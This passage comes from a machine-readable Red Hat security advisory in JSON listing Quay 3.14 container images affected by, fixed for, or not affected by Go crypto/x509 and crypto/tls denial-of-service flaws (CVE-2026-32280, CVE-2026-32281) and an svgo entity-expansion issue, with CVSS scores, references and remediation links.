            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "svgo: SVGO: Denial of Service via XML entity expansion"
    },
    {
      "cve": "CVE-2026-32280",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-04-08T02:01:19.572351+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456339"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456339",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/758320",
          "url": "https://go.dev/cl/758320"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78282",
          "url": "https://go.dev/issue/78282"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4947",
          "url": "https://pkg.go.dev/vuln/GO-2026-4947"
        }
      ],
      "release_date": "2026-04-08T01:06:58.595000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
    },
    {
      "cve": "CVE-2026-32281",
      "cwe": {
        "id": "CWE-1050",
        "name": "Excessive Platform Resource Consumption within a Loop"
      },
      "discovery_date": "2026-04-08T02:01:00.930989+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456333"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go\u0027s `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw occurs during the validation of otherwise trusted certificate chains that contain a large number of policy mappings, leading to excessive resource consumption. Exploitation requires an attacker to present a specially crafted, yet trusted, certificate chain which would require the attacker has already compromised a trusted certificate root. Red Hat continuously monitors certificate authorities and curates the set which is trusted by default for Red Hat products.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
